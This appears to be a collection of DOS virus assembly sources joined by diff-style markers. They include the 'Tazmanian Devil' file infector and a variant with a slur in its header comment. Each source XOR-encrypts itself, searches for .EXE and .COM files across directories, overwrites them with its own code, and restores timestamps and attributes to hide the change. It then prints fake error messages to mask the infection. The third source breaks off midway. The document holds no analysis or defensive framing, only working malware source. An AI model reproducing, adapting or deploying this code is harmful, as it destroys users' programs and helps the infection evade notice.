virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
;---------------------------------------------------------------------
|
||||
; All executable code is contained in boundaries of procedure "main".
|
||||
; The following code, until the start of "virus_code", is the non-
|
||||
; encrypted CMT portion of the code to load up the real program.
|
||||
;---------------------------------------------------------------------
|
||||
main proc near ; Code execution begins here
|
||||
call encrypt_decrypt ; Decrypt the real virus code
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
; ---------- Encrypt, save, and restore the virus code -----------
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
call encrypt_decrypt ; Encrypt most of the code
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
call encrypt_decrypt ; Restore the code as it was
|
||||
ret ; Go back to where you came from
|
||||
|
||||
; --------------- Encrypt or decrypt the virus code ----------------
|
||||
encrypt_decrypt:
|
||||
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
||||
xor_loop: ; Start cycle here
|
||||
mov ah,[bx] ; Get the current byte
|
||||
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
|
||||
mov [bx],ah ; Put it back where we got it
|
||||
inc bx ; Move BX ahead a byte
|
||||
cmp bx,offset virus_code+virus_size ; Are we at the end?
|
||||
jle xor_loop ; If not, do another cycle
|
||||
ret ; and go back where we came from
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; The rest of the code from here on remains encrypted until run-time,
|
||||
; using a fundamental XOR technique that changes via CMT.
|
||||
;-----------------------------------------------------------------------
|
||||
virus_code:
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; All strings are kept here in the file, and automatically encrypted.
|
||||
; Please don't be a lamer and change the strings and say you wrote a virus.
|
||||
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
||||
; changes, even when the strings stay the same.
|
||||
;----------------------------------------------------------------------------
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Bad command or filename$"
|
||||
virus_msg1 db cr,lf," ÜÜÜÜÜÜ$"
|
||||
virus_msg2 db cr,lf," ÜÜÜÜÜÜÜ ÜÜ ÜÜ ÜÛÛÛÛÛÛÛÛÜ$"
|
||||
virus_msg3 db cr,lf,"ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ ÜÛÛÛÝ ÞÛÛÛÛßßÛÛÛÛÝ$"
|
||||
virus_msg4 db cr,lf,"ÛÛÛÛ ÛÛÛÝÛÛÛß ÛÛÛÛÝ ÞÛÛÛÛ ÜÜÜÜ ÜÜÜÜ$"
|
||||
virus_msg5 db cr,lf,"ÞÛÛÛÛÛÛÜ ÜÜ ÜÜ ÜÛÛÛÜ ÞÛÛÛÛÛÝ ÞÛÛÛÛ ÛÛÛÛÝ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÜ$"
|
||||
virus_msg6 db cr,lf,"ÛÛÛÛßßßßÞÛÛ ÛÛÛÝÞÛÛÛß ÞÛÛÛÛßÛÛÛ ÛÛÛÛÝ ÞÛÛÛÛ ÞÛÛÛß ßÛß ÞÛÛÛß ßÛß$"
|
||||
virus_msg7 db cr,lf,"ÛÛÛÛÝ ÞÛÛÝÛÛÛÛÝÞÛÛÛÜ ÛÛÛÛÛÞÛÛÛÜ ÜÛÜ ÞÛÛÛÛÜÜÛÛÛÛÝÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ$"
|
||||
virus_msg8 db cr,lf," ßÛÛÛß ßÛÛÛÛÛß ßÛÛÛß ßÛÛß ßÛÛß Þßß Ý ßÛÛÛÛÛÛÛÛß ÞÛÛÝ ÞÛÛÝ$"
|
||||
virus_msg9 db cr,lf," ÞÛÛÛÝ ßßßßßß ÛÛÛ ÛÛÛ$"
|
||||
virus_msg10 db cr,lf," ÛßÜÛÛ ÞÛÛÝ ÞÛÛÝ$"
|
||||
virus_msg11 db cr,lf," ÞÛßßÝ ÜÜÛÛß ÜÜÛÛß$"
|
||||
virus_msg12 db cr,lf," ÜÜ ÞÛÛÛÝ ÜÜ ßßßß ßßßß$"
|
||||
virus_msg13 db cr,lf," ÛÛÛÛÞÛÛÝÝÛÛÛÛ$"
|
||||
virus_msg14 db cr,lf," ÞÛÝÛÛÛÛÞÜÛÛÝÞÛÛÛÝ ÜÜÜÛÛÛÜ$"
|
||||
virus_msg15 db cr,lf," ÛÛÛÞÛÛÛÛÛÝÜ ÛÛÛÛÛÜÛÛÛßßß$"
|
||||
virus_msg16 db cr,lf," ÛÛÛÛÛßÛÛ ÛßÛÛÛÛÛÛÛßß$"
|
||||
virus_msg17 db cr,lf," ÛÛÛÛÛÛÜ ÛÜÛÛÛÛÛÛß$"
|
||||
virus_msg18 db cr,lf," ßßÛÛÜÛÝÛÛÛÛÛÛÝ$"
|
||||
virus_msg19 db cr,lf," ÞßÛÛÛ ÜÛÛÛÝ$"
|
||||
virus_msg20 db cr,lf," ÛÜÛÛÝßßÜÛÛ$"
|
||||
virus_msg21 db cr,lf," ÞÛÛÜÛÛÛÛÛÛÛÝ$"
|
||||
virus_msg22 db cr,lf," ÞÛÛÛÛÝÛßÛÛÛÝ$"
|
||||
virus_msg23 db cr,lf," ÞÛÛÜÛÜÛÛÛÛÛÝ$"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,10 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,5 ; Are at least 5 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
mov dx,offset virus_msg21
|
||||
int 21h
|
||||
mov dx,offset virus_msg22
|
||||
int 21h
|
||||
mov dx,offset virus_msg23
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
; filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,276 @@
|
|||
cr equ 13 ; Carriage return ASCII code
|
||||
lf equ 10 ; Linefeed ASCII code
|
||||
tab equ 9 ; Tab ASCII code
|
||||
virus_size equ 2197 ; Size of the virus file
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
;---------------------------------------------------------------------
|
||||
; All executable code is contained in boundaries of procedure "main".
|
||||
; The following code, until the start of "virus_code", is the non-
|
||||
; encrypted CMT portion of the code to load up the real program.
|
||||
;---------------------------------------------------------------------
|
||||
main proc near ; Code execution begins here
|
||||
call encrypt_decrypt ; Decrypt the real virus code
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
; ---------- Encrypt, save, and restore the virus code -----------
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
call encrypt_decrypt ; Encrypt most of the code
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
call encrypt_decrypt ; Restore the code as it was
|
||||
ret ; Go back to where you came from
|
||||
|
||||
; --------------- Encrypt or decrypt the virus code ----------------
|
||||
encrypt_decrypt:
|
||||
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
||||
xor_loop: ; Start cycle here
|
||||
mov ah,[bx] ; Get the current byte
|
||||
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
|
||||
mov [bx],ah ; Put it back where we got it
|
||||
inc bx ; Move BX ahead a byte
|
||||
cmp bx,offset virus_code+virus_size ; Are we at the end?
|
||||
jle xor_loop ; If not, do another cycle
|
||||
ret ; and go back where we came from
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; The rest of the code from here on remains encrypted until run-time,
|
||||
; using a fundamental XOR technique that changes via CMT.
|
||||
;-----------------------------------------------------------------------
|
||||
virus_code:
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; All strings are kept here in the file, and automatically encrypted.
|
||||
; Please don't be a lamer and change the strings and say you wrote a virus.
|
||||
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
||||
; changes, even when the strings stay the same.
|
||||
;----------------------------------------------------------------------------
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Program too big to fit in memory$"
|
||||
virus_msg1 db cr," ÜÜÜßÜÛÛÛÜ $"
|
||||
virus_msg2 db cr," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
|
||||
virus_msg3 db cr," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
|
||||
virus_msg4 db cr," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
|
||||
virus_msg5 db cr," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
|
||||
virus_msg6 db cr," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
|
||||
virus_msg7 db cr," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
|
||||
virus_msg8 db cr," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg9 db cr," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
|
||||
virus_msg10 db cr," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg11 db cr," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
|
||||
virus_msg12 db cr," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
|
||||
virus_msg13 db cr," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
|
||||
virus_msg14 db cr," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
|
||||
virus_msg15 db cr," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
|
||||
virus_msg16 db cr," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
|
||||
virus_msg17 db cr," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
|
||||
virus_msg18 db cr," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
|
||||
virus_msg19 db cr,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
|
||||
virus_msg20 db cr," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
|
||||
virus_msg21 db cr," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
|
||||
virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,4 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,6 ; Are at least 6 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
mov dx,offset virus_msg21
|
||||
int 21h
|
||||
mov dx,offset virus_msg22
|
||||
int 21h
|
||||
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
|
|
@ -0,0 +1,240 @@
|
|||
cr equ 13 ; Carriage return ASCII code
|
||||
lf equ 10 ; Linefeed ASCII code
|
||||
tab equ 9 ; Tab ASCII code
|
||||
virus_size equ 562 ; Size of the virus file
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
main proc near ; Code execution begins here
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
ret ; Go back to where you came from
|
||||
|
||||
|
||||
virus_code:
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
|
||||
virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
|
||||
virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
|
||||
virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
|
||||
virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
|
||||
virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
|
||||
virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
|
||||
virus_msg7 db cr,lf,tab," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
|
||||
virus_msg8 db cr,lf,tab," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
|
||||
